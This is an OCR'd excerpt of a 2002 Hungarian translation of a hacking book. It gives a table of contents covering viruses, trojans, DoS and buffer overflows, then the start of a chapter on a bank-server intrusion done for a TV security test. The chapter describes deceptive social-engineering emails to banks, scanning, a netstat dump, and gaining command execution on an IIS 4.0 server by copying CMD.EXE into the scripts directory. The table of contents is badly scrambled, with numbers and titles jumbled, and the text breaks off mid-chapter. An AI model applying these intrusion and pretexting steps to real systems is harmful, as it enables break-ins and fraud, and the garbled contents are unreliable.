Thomas Vosseberg

Feltörés kontra védelem
Fontos figyelmeztetés!
A szerző a könyv teljes tényanyagát a legnagyobb gonddal dolgozta ki, illetve állította össze, és hatékony ellenőrzések mellett készítette. A hibák ennek ellenére sem zárhatók ki, ezért a kiadó és a szerző kénytelenek felhívni a figyelmet arra, hogy hibás közlésekre visszavezethető következményekért sem garanciát, sem jogi vagy bármilyen értelemben vett felelősséget vagy jótállást nem vállalnak. Az internetcímek vagy a verziószámok a szerkesztés lezártakor rendelkezésre álló állapotot tükrözik. A kiadó és a szerző semmilyen felelősséget vagy garanciát nem vállal a változásokért, amelyek tőlük függetlenül fellépő körülményekből adódnak. Az esetleg letöltésre kínált fájok és információk kizárólag nem üzleti felhasználásra szolgálnak. Üzleti felhasználás csak a licenctulajdonos beleegyezésével lehetséges. © 2002 Franzis1 Verlag GmbH, 85586 Poing © 2002 Computer Panoráma, 1091 Budapest, üllői út 25. Felelős kiadó: Dely Tamás ügyvezető igazgató Felelős szerkesztő: Horváth Annamária Fordította: Murányi Eszter Tervezőszerkesztő: Dancs Katalin Címlapterv: Szincsák László Minden jog fenntartva. Jelen könyvet, illetve annak részeit tilos reprodukálni, adatrendszerben tárolni, bármely formában vagy eszközzel - elektronikus, fényképészeti úton vagy más módon - a kiadó engedélye nélkül közölni. A kötetet készítette: Levilágítás: HVG Press Nyomtatás és kötés: Szegedi Kossuth Nyomda Kft. 6723 Szeged, Makkosházi krt. 1. Felelős vezető: Gera Imre ügyvezető igazgató
ISBN: 963 7639 225

Tartalom
1. A BANK-HACKELÉS 1.1 A feladat 1.1.1 Feltételek 1.1.2 A megoldáshoz vezető út 1.2 Hozzáférési út - információszerzés a Social Engineering módszerrel 1.3 A megfelelő cél keresése 1.3.1 Takarékpénztárak - túl sok szerverellenőrzés 1.3.2 Kutatás: IIS szerver kerestetik 1.3.3 Az operációs rendszer és a tranzakciós szoftver 1.3.4 Hogyan védik a szervert? 1.3.5 Nincsenek logfájlok - ezt biztosan az OFX irányítja 1.3.6 Adatátadás scriptekkel 1.3.7 Az adatletöltés 1.4 Utóirat a bank-hackeléshez 1.5 Összefoglalás 1.6 Sajtóbeszámolók 1.7 Tapasztalatok más bankoknál 1.7.1 Forgatókönyv a takarékpénztár-területen 2. A WINDOWS-RENDSZEREK (9X, NT, 2000) GYENGE PONTJAI 2.1 A hackeren túl - merevlemez-fejreállás, adatbetekintés vagy lopás 2.1.1 Különbségek a Windows 9x, az NT és utódai között 2.1.2 A fizikai támadás 2.1.3 Képernyővédő - jelszó - a bennfenteseknek nem okoz problémát 15 16 16 17 18 20 20 21 22 23 26 26 28 29 29 30 33 33 37 38 39 39 42

2.1.4 Automatikus lejátszás - a betörés előkészítése CD-vel
2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak

44
47 47

2.2.2 A jelszófájlok
2.2.3 Jelszavak a Windows 2000 alatt 2.3 A távoli elérésű támadás - internet- vagy hálózati felhasználók, vigyázat! 2.3.1 A fájl- és nyomtatómegosztás - veszélyes biztonsági rések 2.3.2 Mik azok a szkennerek, és hogyan működnek? 2.3.3 Milyen lehetőségeik vannak a betolakodóknak?

49
51 52 53 54 56

2.3.4 2.3.5

Jelszóval védett megosztások BruteForce-rohamok a megosztási jelszavak ellen

57 57
58 59

2.3.6 Óvintézkedések 2.4 További támadási technikák 3. ALAPOK

3.1 Az anonim Internetezés csökkenti a kockázatot 3.1.1 A legtöbb felhasználó sokat elárul 3.1.2 Névtelenül
3.2. A TCP/IP 3.2.1 Mi a TCP/IP?
3.2.2 Különböző protokollok a rétegekben 3.3 Néhány alkalmazás és protokoll használata és a biztonságosságuk 3.3.1 A Telnet

61 62 63 65
68 68
70 80 81

3.3.2 Az FTP 3.3.3. Az IRC
3.3.4 3.4 4. 4.1 4.2 4.2.1 Az IP-címzés Aportokról A TRÓJAIAK A történelmi minta Miből áll egy trójai? A szerver kiosztása

82 84
85 87 91 92 92 93

4.2.2 4.2.3 4.3 4.3.1 4.3.2 4.3.3 4.3.4 4.3.5 4.3.6 4.3.7 4.4 4.4.1 4.5 4.5.1 4.6 4.6.1 4.6.2 4.6.3 4.6.4

A kliens otthon marad, és vezérli a szervert Hogyan szerzik meg a hackerek az IP-t? így álcázzák és terjesztik a trójaiakat A trójaiakat fájlokba integrálják Álcázás a WinZip-pel. A trójaiakat az ICQ-val is tovább lehet adni Elég egy CD és az automatikus lejátszás funkció A lemezek majdnem ugyanígy működnek További terjesztési stratégiák Mit csinálnak a hobby-hackerek a trójaiakkal? Sub7 - egy trójai rémisztő lehetőségekkel Támad a Sub7 BackOrifice 2K - Hálózati eszköz vagy támadás a Microsoft ellen A BO2K és összetevői így ismerjük fel a trójait a rendszerünkben Vírus- és trójai-szkenner AutoRun bejegyzések Windows-Registry - ez már izgalmas Módszerek az Explorer.exe-vel a C:\ meghajtóra

94 95 96 96 97 98 99 100 100 101 102 103 105 106 107 107 108 109 112

4.6.5
5.

A runonce.exe kicserélése
VÍRUSOK - VESZÉLYES FÁJLOK

112
113
115 116 117 117 117 118 118 119 119 119 121 121 122 122 122 124 124 124 125 125

5.1 Alapok 5.1.1 Defektes cluster mint álcázás 5.1.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.1.3 Videokártyák - az elvetemült támadók búvóhelyei? 5.2 A vírus felépítése 5.3 Hogyan fertőz meg a vírus egy fájlt? 5.3.1 így fertőznek a bootszektor vírusok 5.3.2 A dropper vírust helyez el 5.4 A legfontosabb vírustípusok rövid áttekintése 5.4.1 Bootszektor vírusok 5.4.2 Companion vírusok 5.4.3 Killerprogramok 5.4.4 Logikai bombák 5.4.5 Makrovírusok 5.4.6 Hálózati vírusok 5.4.7 Polimorf vírusok 5.4.8 Stealth vagy rejtőzködő vírusok 5.4.9 A TSR fájlvírusok 5.4.10 Update vírusok 5.4.11 Férgek - az ILOVEYOU és társai

5.4.12 Időzítők
5.5 Word makrovírus írása 5.5.1 Minden ténykedés központja - a Normal.dot fájl 5.5.2 Modul vagy osztálymodul? 5.5.3 Vírusok kontra ServiceRelease 5.5.4 Modul makrók 5.5.5 Ilyet is lehet: a vírus egy Payload-ot hív meg 5.5.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.5.7 A vírus jelszóval védi a fájlt 5.6 Megfertőzött osztálymodulok

126
126 126 127 127 127 131 132 133 133

5.7

ILOVEYOU

137
138 138 140 140 149 149 150

5.7.1 Mi az a féreg? 5.7.2 A működési mód 5.7.3 Hogyan tudott a féreg elterjedni? 5.7.4 A forrás - kommentárokkal 5.8 Hogyan működnek a vírusvizsgálók? 5.8.1 Szkennermodul 5.8.2 Víruspajzs

8.1.7 6.3.1.9 Védelem a DoS-támadások ellen 11.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők Ismert felhasználói nevek jelszavainak a kitalálása A beállítások egy áttekintésben Jelszavak megfejtése a John the Ripperrel Single Mode A szólista módszer Incremental mód Extemal mód A John legfontosabb parancsai 157 158 160 161 162 162 163 163 164 164 165 165 7.2 Out-of-Band csomagok .2.2 A fájlmelléklet kitömése 8. A DENIAL OF SERVICE TÁMADÁS 10.biztonsági kockázat? 8.4 7. SNIFFER 9.1 Mailbombák .4.2.2. 7.1.2.4 7.9 Fragmentált szkennelés UDP-lCMP-Port-Unreachable szkennelés UDP-Recvfrom-And-Write szkennelés ICMP-echo-scanning/ping-szkennelés A nyitott portok csak a kezdetet jelentik A portszkennelés elleni védelem 154 154 154 155 155 155 152 7.8 6.4 „Fertőtlenítő" A vírusvédő program kiválasztásának a szempontjai 150 150 6.3.1 7.6 Ping-Flodding 10.2.1 Hogyan lehet ezt kihasználni? 165 167 168 168 170 172 174 175 176 181 182 182 184 184 187 188 189 190 190 191 192 192 192 193 195 196 197 197 197 197 198 .2.2.2 Szkennelési eljárások 6.1 E-mail-támadások 8.2 Hogyan működik egy sniffer? 9.1 Mi az a sniffer? 9.1.6 6.5 JELSZÓFELTÖRÉS Hackelt security-site . TÁMADÁSOK AZ INTERNET-FELHASZNÁLÓK ELLEN 8.2.3 Large Packet-támadások avagy a Ping of Death 10.2 ICQ .túlcsordul a postafiók 8. SZKENNELÉS .8.5.A RÉSEK KERESÉSE 151 152 153 153 153 6.1 Az ICQ .2 Félig nyitott TCP-szkennelés 6.4.4.3 A ConCon bug 8.1.2 Milyen biztonsági rések vannak? 9.4.1 Az IP-spoofing mint előfeltétel 10. A szkenner 6.a „nuken" 10.5 6.2 7. BUFFER-OVERFLOW 11.2 A Buffer-Overflow-támadások 11.4 6.2 7.2.2.4 Land támadások 10.5 TCP-Syn-Flooding 10.6 A jelszófájl 8.1.3 A sniffer veszélyei 9.2 Adatok 11.3 TCP-FIN-Scan 6.2 7.4.3 7.4 Mit lehet tenni a snifferek ellen? 10.1 Az operációs rendszer memóriakezelése 11.7 Smurf 10.8 DDoS .1 7.praktikus és veszélyes 8.3 Astack (magyarul: halom/rakás) 11.1.1 Szöveg 11.3 7.1 7.Distributed Denial of Service támadások 10.2.3 5.1 Szkennelés teljes TCP-kapcsolattal 6.4.2.

2 Hogyan működik? 11.2 Desktop tűzfalak 13.2.1 A CGI további ismert gyenge pontjai 12.count.2 Védelem a desktop tűzfallal 231 232 233 234 235 236 237 239 240 .cgi 12.2.5 Milyen védelmi mechanizmusok vannak? 11.1 CGI-scriptek biztonságossága 12.3 Tűzfal-koncepciók 13.2 A Buffer-Overflow-k és a tűzfalak 199 202 208 209 211 212 212 12.11. TŰZFALAK 13.5.1 Összefüggés a CPU és a Buffer-Overflow között 11.1 Egy desktop tűzfal megtámadása 13.3 Áldozat a Buffer-Overflow-kért 11.1.4 Hogyan ismeri fel a támadó a tűzfalat? 13.4 Jelszóval védett webterületek megtámadása 12.6 Hogyan védhetjük meg a webszervert? 225 226 227 229 13.4.3 BBS biztonság 12.4 Honnan lehet felismerni a Buffer-Overflow-t? 11.2 Védelem 12.1.1.5.1 Védelem 12.1 A tűzfal feladatai 13.2.a „script kidek" nemzeti sportja 12.3 Minek kell a Shellcode változónál állnia? 11.1 A tűzfal biztonsági szempontból fontos összetevői 13.2 A tűzfalak kategóriái 13.2.1.2 Hitelkártya fake-ek 12.1.2 Látogatásszámláló résekkel .4. BIZTONSÁG A WEBEN 213 214 217 221 221 222 224 12.1.5 Defacement .

.. A biztonság kérdését kétféleképpen lehetett megközelíteni: « Mennyire védettek az ügyfelek adatai.. vannak-e lehetőségek betörni egy banki szerverbe? • Mennyire biztonságosak a tranzakciók...1 Forgatókönyv a takarékpénztár-területen. manipulálni....3.6 Adatátadás scriptekkel......33 1.........1 A feladat 2001 júniusában érdekes feladatot kapott egy fiatal hacker-csoport: banki rendszereket és elektronikus kártyákat kellett tesztelniük... Ki kellett kémlelni az adatokat........Tartalom A feladat........7.. 26 1...29 Sajtóbeszámolók....jogi megfontolásokból . a bank nevét a szerzők ....... Manipulálni kellett a tranzakciókat.. Ezek közé tartoztak: « Egyeden ügyfelet sem érhet kár.....4 Hogyan védik a szervert?..... átirányítani stb.1 Takarékpénztárak-túl sok szerverellenőrzés....... ......... mennyire biztonságos manapság az online banki ügyintézés Németországban.......2 Kutatás: IIS szerver kerestetik .1................ 4... 1. s az ARD Technikai Tanácsadó műsor keretében kellett ellenőrizni....5 Nincsenek logfájlok ................ A támadás visszhangja a könyv szerzőjére nézve mindenképpen pozitív volt. 1.1 Feltételek...3...............3 Az operációs rendszer és a tranzakciós szoftver 22 1...21 1.. sem korlátozni a működésében..........1..............2 A megoldáshoz vezető út A dolog a következőképpen zajlott: 1.. Meg kellett találni a hozzáférési utat az adatokhoz vagy a szerverhez...3...... Ez azt jelentette..... • Mindennek észrevétlenül kellett történnie.... • Trójai elhelyezése a homebanking-ügyfeleknél.................... 28 Utóirat a bank-hackeléshez 29 Összefoglalás..... hogy megakadályozza a hiányosság nyilvánosságra kerülését... hogy az végrehajthatatlanná váljon.3.... így a támadás ennek a könyvnek a megjelenésekor már nem ismételhető meg................. csak a bank jött ki rosszul az ügyből............. és fel kellett deríteni a manipulációs lehetőségeket....16 1......... 2.információszerzés a Social Engineering módszerrel___18 A megfelelő cél keresése.3..... Két lehetséges indítás jutott a csoport eszébe: • Az intézmény webszerverének a megtámadása......... Az érintett intézmény a „betörés" hatására ugyan változtatott online banking rendszerén. amelyről ebben a fejezetben írunk......1.20 1.1.. fejezet .......3...........23 1.............. 3............ ám mivel a potenciálisan fenyegető károk még most is jelentősek lehetnek................30 Tapasztalatok más bankoknál.................33 1 A bank-hackelés Rövid ideig az érdeklődés középpontjába került egy különös támadás egy németországi bankszerver ellen............ amelyeket a homebanking során végrehajtanak? Van-e lehetőség.... Be kellett törni a rendszerbe......... ..1 Feltételek A feladat természetesen bizonyos feltételekhez volt kötve.7 Az adatletöltés.......17 Hozzáférési út ..20 1... és ezt követően a banki szerver megtámadása a ...1......16 1....... • A bank online rendszerét nem lehetett sem zavarni... adatokat lekérdezni......3.... hogy egyetlen tranzakciót sem lehetett úgy manipulálni vagy hamisítani..2 A megoldáshoz vezető út......? 1..ezt biztosan az OFX irányítja .........letakarták..... 26 1... nehogy az érintett bank az adás sugárzása előtt ideiglenes intézkedéseket tegyen...........................

Ráadásul egy ilyen indítást állandóan felügyelni is kell. A plug-gateway tűzfala minden csomagot analizál. amelyben ügyfélnek adták ki magunkat. Néhány terepkísérlet után azonban ez a lehetőség a hajánál előrángatottnak tűnt. Más megoldást kellett tehát találni. és most tudni akarja a saját bankjáról. a szerzőket is meglepve. hogy valójában mennyire van biztonságban ennek az intézménynek a pénze. Körülbelül 5 nap és 9 „Aggodalomra semmi ok. installálni kell a trójait stb. amely a Cisco router és a bank szervere között található. 1. Ezt a mailt elküldték 10 nagy német pénzintézetnek. és azt sem tudták. át kell játszani nekik egy trójai vírust. hogy aligha lehetne végrehajtani a tulajdonképpeni tesztet. és csak az exkluzíván az online banki rendszer elé kapcsolt pluggateway-en.2 Hozzáférési út . és 263. Így az ügyfelek banki adatainak az átvitele az online banking oldal betöltésétől kezdve biztonságos és kódolt. hogyan is védi a bank az online ügymenetet és az ügyfelek adatait. hogy a felépítése miatt ne tudjanak egy szabvány ügyfélszolgálati szöveggel válaszolni rá. mint nálunk. S ha egy ilyen akció kitudódna. Azonban a saját ügyféltanácsadót kérdezgetni bankja szerverének részleteiről nem túl szerencsés. Az egyszerűbb természetesen a régi jó trójaihoz való visszanyúlás lett volna: néhány PC-t kikémlelni. 202. hogyan is néznek ki pontosan a banki rendszerek. A mailt úgy kellett megírni. Ügyfeleket kell találni. és az internetről jövő kapcsolattól fizikailag elválasztott kapcsolatot állít elő a webszerverhez úgy. integrált tűzfallal. enged át kéréseket. hogy semmilyen visszacsatolás nem lehetséges kívülről a külső rendszerre. 1. lecsapni. Az ÖN XY bankja. vagy pedig gyanút fog. amely csak a 443-as portot (HTTPS-kódolású adatátvitel SSL-lel) bocsátja rendelkezésre. Több banknak e-mailt írtak. hogy egyszer azért megpróbálkoznak vele. hiszen többnyire maga sem tud róla semmit. annak olyan sajtóviszhangja lenne. hiszen a kikémlelés után várni kell az első homebanking tranzakcióra. amelyeket nyugodtan fel lehet mutatni. hiszen talán csak kisebb hiányosságokra bukkannak. §-aira való tekintettel. és végezetül szenvtelenül megkérdezték. Végülis arra a döntésre jutottak. A megfelelő lehetőséget tehát csak egy pénzintézet webszerverének a feltörése jelenthette. Továbbá az . Intrusion Detection System is található. Először tehát információkat kellett gyűjteniük. aki hallott egy másik bank webszerverét ért hackertámadásról. Először tájékozódni kellett a banki struktúráról. Természetesen egyik résztvevőnek sem volt pontos koncepciója. A plug-gateway. amikor az ügyfél online intézi banki ügyeit. amely naplózza. Éppen ezért hálózattech-nikailag jártasnak mutatták magunkat. amelyek online portált működtetnek." típusú szabványmail után. A Cisco router mögött még egy exkluzíván az XY bank számára installált. az alábbi mail érkezett. és csak a szűrőszabályok (csak HTTPS elérések engedélyezettek) teljesülése esetén továbbítja az online banki rendszer webszerverére. illetve védett-e az online banki szolgáltatása. Ez természetesen heves vitákat váltott ki. nem utolsósorban a (német) Btk. Az infrastruktúra Az XY bank online banki rendszerének infrastruktúrája a következők szerint van kiépítve: Valamennyi online banking megkeresés egy Cisco routeren keresztül érkezik.kikémlelt ügyféladatokkal. a következő feladatokat látja el: Az internetkapcsolat és a webszerverhez kapcsolódás fizikai szétválasztása: egy külső rendszertől induló kapcsolat felépítésénél átveszi a kapcsolatot. a pénze sehol sincs nagyobb biztonságban.információszerzés a Social Engineering módszerrel Mindenekelőtt személyes kapcsolatokon keresztül próbáltak információkat szerezni a bankszerverről. jelzi és vissza is veri a rendszer elleni támadásokat. majd a megfelelő pillanatban.

Mivel a keresett formátumból tulajdonképpen nem sok volt. és semmilyen visszacsatolást nem engednek meg a valójában felhasznált PIN-re. és ott úgy változtatják meg a login-oldalakat. Az adminisztrátor 2001.). Ezek gondoskodnak a számlaszámok és a PIN-ek belépő ellenőrzéséről. operációs rendszer. hogy nincsenek-e esetleg kódolva ezek stb.de.06. hogy minden egyes bankot megvizsgáltak. hogy keresnek egy nagyobb bankot. Itt van példának a www.2 Kutatás: US-szerver kerestetik így tehát inkább a nagyobb bankokra kellett összpontosítani. nem sikerült. és kezelik a további ügyfélinformációkat. például az OFX-et (Open Financial Exchange). A PIN-ek kódolva vannak tárolva az adatbázisban. Ez egy jól sikerült példa volt a Social Engineeringre. Ennek az oldalnak a szervere Schwerinben van. havi biztonsági analízise A rendszeradminisztrátor 2001. hogy minden bevitel egy log-fájlba vándoroljon. mert például Hannoverben majdnem minden takarékpénztárat ÉszakNémetországból hostolnak. hogy lássák a szervereiket. arra a módszerre amelynek révén részletes bepillantást nyerhettek a banki webszerver biztonsági intézkedéseibe. 06. azonban néhány szkennelés (közelebbit ld. hóban maga hajtott végre szkennelést a nyitott internetfellépés és a bank online rendszere ellen. Takarékpénztárak . Miután ezekről a szerver-kliens szoftverekről csak szűkös információkat találtak. Részletek a szerverekről . biztonságos internet-eléréssel érhető el. 1.finommunkák Ami a mail-bői nem derült ki. 2. Szkenneltek néhány bankot. hogy további információkat tudjunk meg a rendszerről (hardver. Hannoverben található. de a tulajdonképpeni oldal. később) eredményeként már világos volt: minden bank különböző pénzügyi szoftvereket használ.hotnebanking-mecklenburgvorp. port) a 128 bites kódolású. hogy az adminek „a gépen ülnek". szerver stb. hogy csak egy bank login oldaláról juthatnak hozzá az ügyfelek adataihoz. hogy ugyan majdnem minden takarékszövetkezetnek van saját weboldala.3. melyik bank legyen az? 1. ahol az ügyfelek a számlájukhoz férnek. Az volt ugyanis a probléma velük. Biztonság Az infrastruktúra (hardver és rendszerszoftver szinten) megfelelő védettsége érdekében még a következő biztonsági intézkedéseket tettük az online banki ügyintézésnél: A kliens és a szerver közötti kapcsolat 128 bites maximális kódolással épül fel. a következő cím alatt fut: https://ww2. Ez a szabvány az internetes tranzakcióknál biztonságos.adatbázis szerver fizikailag el van választva a webszervertől és az alkalmazástól. ám az onlinebanking egy számítógépközponton keresztül zajlik. Mint várható. miközben ez a szerver a DVG-nél. így az adatbázist egyáltalán nem lehet közvetlenül elérni az internetről. az online banki rendszer csak HTTPS-en keresztül (443.túl sok szerverellenőrzés A német takarékpénztárak az infrastruktúrára vetett rövid pillantás után kiestek.3 A megfelelő cél keresése Az ötlet tehát az volt. Még ha lehetséges is lenne adatokhoz jutni az OFX-adatbázisból.de/cgi/anfang. és már egy tesztcélú szkennelés is figyelmet keltene.ostspa. amelynek a szervere közvetlenül csatlakozik az online banking-hez. továbbra is tisztázatlan. A részletes információk szkennelése .1. A hackeléshez tulajdonképpen csak egy Microsoft HS-szerver jöhetett szóba. Egy támadás itt egy kicsit melegnek tűnt. A kérdés csak az volt.cgi/Ostseespk_Rostock. A kísérlet.3. 3. azzal kezdhettek. világossá vált a számukra. és ki lehetett indulni abból. 1.

Ellenőrizni a védelmi mechanizmusokat. Hitelesíteni. mint egy leányvállalat. mert nem válaszolt a pingekre. a szervert tűzfal védi. Feltérképezni az operációs rendszert és a tranzakciókhoz használt szoftvert. 4. Utólagos becslések szerint az említett szám 5000 és 9000 között mozgott óránként. mert e bank ügyfeleinek egész Németországban erről a portálról kellett bejelentkezniük. amely a parancsok dekódolását érintette.) Napokig tartó szkennelés után találták meg a ••• oldalt. A támadáshoz a következő lépéseket kellett végrehajtani: 1.3 Az operációs rendszer és a tranzakciós szoftver Egy NT-webszerver IIS 4.4 Hogyan védik a szervert? Úgy tűnt. egy portált. fejezetben részletesen is olvashatnak. Tehát abból indulhattak ki. 2. amely e bank mellett szólt. Egy további érv. amelyen keresztül úgy a bank. lehetséges. A bank minden szakembere az új projekten dolgozik. így az oldal elérési számainak is magasnak kellett lenniük. a ••• ügyfelei be tudtak login-olni. tökéletesen elegendő volt. úgy az oldalé. Tesztelni az exploitokát. A program szállította a legfontosabb információkat az egyes bankok és takarékpénztárak webszer-vereiről. hogy vannak-e logfájlok információkkal.Itt láthatók az infók a felhasznált szerverekről A szkennelő program segítségével különböző bankportálokat vizsgáltak.3. (A szkennelés témájáról a 6. 1. 3. 6.az előkészítés feltételei A cél optimálisnak tűnt. hogy megtalálják a betörésre alkalmas rendszert. a szerver tervezett átépítése volt. Kikutatni az adatátvitelt. és kapcsolatokat sem engedett meg . Tivoli Management Software-rel karbantartva (amelynek a hibáiról lehetett már hallani)! De ezt ezen a szerveren nem ellenőrizték. mint magáé a rendszeré. Ellenőrizni. 1. és a még futó régi rendszert „elhanyagolják".3. így a webszerver megtámadásának az időpontja több mint ideális. mert egy végzetes rés a IIS-en. hogy sikerrel járnak. A cél ismertetőjegyei . 5.0-val.

130.0:0 0.xx:138 1 72.27.0.209.209. A szkennelések során nem derült ki pontosan.kifelé.0.0:161 0.0:1037 0.0.0. 152.0.0:0 0.158.xx:80 193.0.0.0.xx:138 193.0.xx:80 193.209.158.152.236:57480 193.xx:80 193.1:1025 127.0.4:80 172.0.0.0.0:3038 0.0.0.130. Íme a netstat-jelentés: Prot.0.xx:443 Távoli címek 0.0:2874 0.209.0.0. 152.153.213:1233 62.209.24.153. port) és a HTTPS-en (443. 133.0:0 172.0.209.0:4487 0.0. 209. 152.0:0 0.0.1:1025 127.24.211:4232 62.0.46.0.213:1234 62.209.0.24.0.0:135 0.0.213:1237 62.0:3037 0.0.27.xx:443 Távoli címek 62.0.0:0 0.xx6.0. xx:443 193.0.xx:443 193.0:0 Állapot LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING ESTABLISHED LISTENING LISTENING ESTABLISHED LISTENING LISTENING LISTENING LISTENING ESTABLISHED TIME_WAIT ESTABLISHED TIME_WAIT TIME_WAIT LISTENING TIME_WAIT TIME_WAIT ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED LISTENING LISTENING LISTENING LISTENING CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TC P TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.0.0.158.0.0:0 0.0.213:1236 62.0.5:1435 172.0.0:0 0.209.0:0 0.0.130.0.0.0.24.xx:80 193.0:0 0.158.209.0:0 0.0.24.0.1 52.5:1435 172.101.153.0.0.158.0.0:0 0.24.0:0 62.130.27.0.24.0. TCP Helyi címek 193.0.0:4796 0.0:0 0.158.0.213:1182 62. hogy a webszolgáltatón (80.0.0.158.0.xx:443 193.209.0:3111 0.0.144:1073 217.197.153.197.0.0:3697 0.158.158.0. mert a netstat-jelentés 4:00 óra körül kapcsolatokat mutatott a 4966/4967 portra.0:0 0.0.24.0.209.206.0. 152.24.61:1119 212.0. 152.24.0.0:0 127.130.0.xx:80 193.158.xx:137 193.0:0 0.0.1 58.152.157.0.0.133:4233 0.0.213:1238 Prot.1:1026 127.xx: 137 172.158.0:3168 0. xx:3038 1 72.209.0:0 0.1:1025 0.0. port) kívül más portok elérése is megengedett-e.0:0 0.24.213:1235 62.130.27.4:1557 212.0:2882 0.xx:80 193.0.0.0.0:0 0.209.209.0:3128 0.0. Mivel a távoli számítógépet egy komputernévvel jelölték.xx:80 193.209.0:135 0.xx:80 193.27.0:0 0.46.0.0.209.0.0.xx:443 193.0.xx6. intranet kapcsolatból indulhattak ki.0.0.0:0 0.158.0.0. xx:3125 172.0. de ezt kizárni sem lehetett.0.0:0 0.0:1031 0.xx:80 193.xx:443 193.0:2867 0.0.0. 209. 152.0:3489 0.0.0.158.0.209.209.xx:31 11 172.1 58.0. milyen tűzfalról volt szó.0.24.27.xx:443 193.0.0:3125 0.0.xx: 139 1 72.0.0.158.0.0.158.211:4233 62.166.213:1240 Állapot TIME_WAIT .158.0.0.xx:80 193.130.0.0.0:0 0.191:1042 212.209.0.0:0 0.0.0:0 0.4:80 172.0.0.0:0 0.158.0.0:512 0. 158.3:1036 62.0.xx:139 193.153.27.0:0 127.0.0:5044 127.2.1:1028 127.xx:443 193.0.0.xx: 1029 172.xx:3127 193.0.24.0.166.0.1:1031 0.130.0:0 62.0.0.0:0 0.0.158.4.0.5:1435 0.0.158.209.0:0 0.0.197.0.158. Helyi címek TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.0.145.0.0.0:1027 0. és azt sem lehetett megmondani.1:1031 1 72.27.xx:3126 172.24.0.27.0.0:0 0.0:0 0.

milyen módon lehetne megtámadni a szervert.xx:443 193.0.209.xx:1186 62.0:161 172.56.xx:443 193.158.11. és ott hasonlítják össze.209.152. sem a C:\WINNT\ system32\LogFiles könyvtárban. xx:443 193.1 58. 152.209.158.xx6.209.213:1242 62.xx:1185 62.xx6.0:135 0.xx:443 193.213:1241 62.3.209. 209.153.xx:3128 209.158.158.xx: 11 94 62.xx6.xx:443 193.213:1247 62.19. Az OFX-et az ASP-oldalakról . Előkészületek (hozzáférés megszerzése) A megfelelő URL megadásával elérték a hozzáférést.27.xx:443 193. A parancsfordító CMD.59.27.24.209.xx:443 193.158.xx:443 193. 154.27.3:1039 62.TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP DP UDP UDP UDP UDP UDP 193.158.213:1245 62. hogyan is fogadja és továbbítja a rendszer az adatokat bejelentkezéskor. Feltételezték.xx:443 193.1 58.xx:443 193.209.158.158.158.158.158. sem adatbázis-jelszavakat vagy hasonlókat nem találtak. amelyek azonban nem adtak információt a kapcsolatokról.209. 152.0:0 193.27. hogy ezeket központilag tárolják egy számítógépen.xx:443 193. xx:443 193.1 58.3:1040 62. a felhasználói adatokat egy adatbázisba küldik.xx:138 1 72.158.130. Tehát a tranzakcióknál a tranzakciók számai.153.19.3.158.27.xx:1030 62. hogy működőképesen legyen kezelhető a . hanem JAVA scripteket használnak .1 58.xx:138 193.xx6. és az adatokat nem lokálisan ellenőrzik.19.158.27.0. amely aztán visszaadja a hibakódokat.209.158.3:1044 62. 1. Természetesen pontosan megnézték.xx:443 193.54.xx:443 193.xx6.xx6. 209.xx:443 193.xx:1182 62. illetve kezeli az OFX szoftver.xx:443 1 93.158.209.152.158.158.xx:3128 0.19.209.24. hogy vagy a tűzfal log-okat értékelik ki.158.153.vezérlik.158.209.158.27.130.209.xx:137 193.158.3:1043 62.130.158.xx:443 193.27.0.209.27.EXE-t a webszerver rendszerkönyvtárából a script-könyvtárba másolták.130.xx:443 193.1 58.xx:443 193.xx6.xx: 1029 193.209.213:1244 62.xx:3121 193. sem máshol.xx:443 193.165.xx: 1030 193.209.6 Adatátadás scriptekkel A szkennelés után világos lett.209. vagy teljesen lemondanak a loggolásról! Az OFX-ről A szerveren sem folyószámla-adatokat.xx:137 172.209.3:1038 62.209.130.xx: 1202 0.56.0.152.27.213:1243 62.27.27. Találtak viszont OFX-szoftver-jelentéseket.0.209.209. 209.27. 209.24.xx:443 193. xx:1277 193.158. Ebből továbbra is arra következtettek.209.209.xx:443 193. és ezt éri el.3:1037 62.209.5 Nincsenek logfájlok ezt biztosan az OFX irányítja IIS logfájlokat egyáltalán nem találtak.130.amelyek szokatlan módon nem VB scripteket.xx:443 193.xx:443 193.130.0.xx6.xx:443 193.xx:443 *:* *:* *:* *:* *:* *:* *:* TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT ESTABLISHED CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT CLOSING TIME_WAIT ESTABLISHED CLOSING LISTENING ESTABLISHED *:* 1.153.xx:2326 63.213:1246 62.24.3:1041 62.27. 209.24.1 58.209.209.xx:1184 62. a PIN és a felhasználó által megadott TAN az OFX-hez továbbítódik.158.27.xx6.3:1042 62.

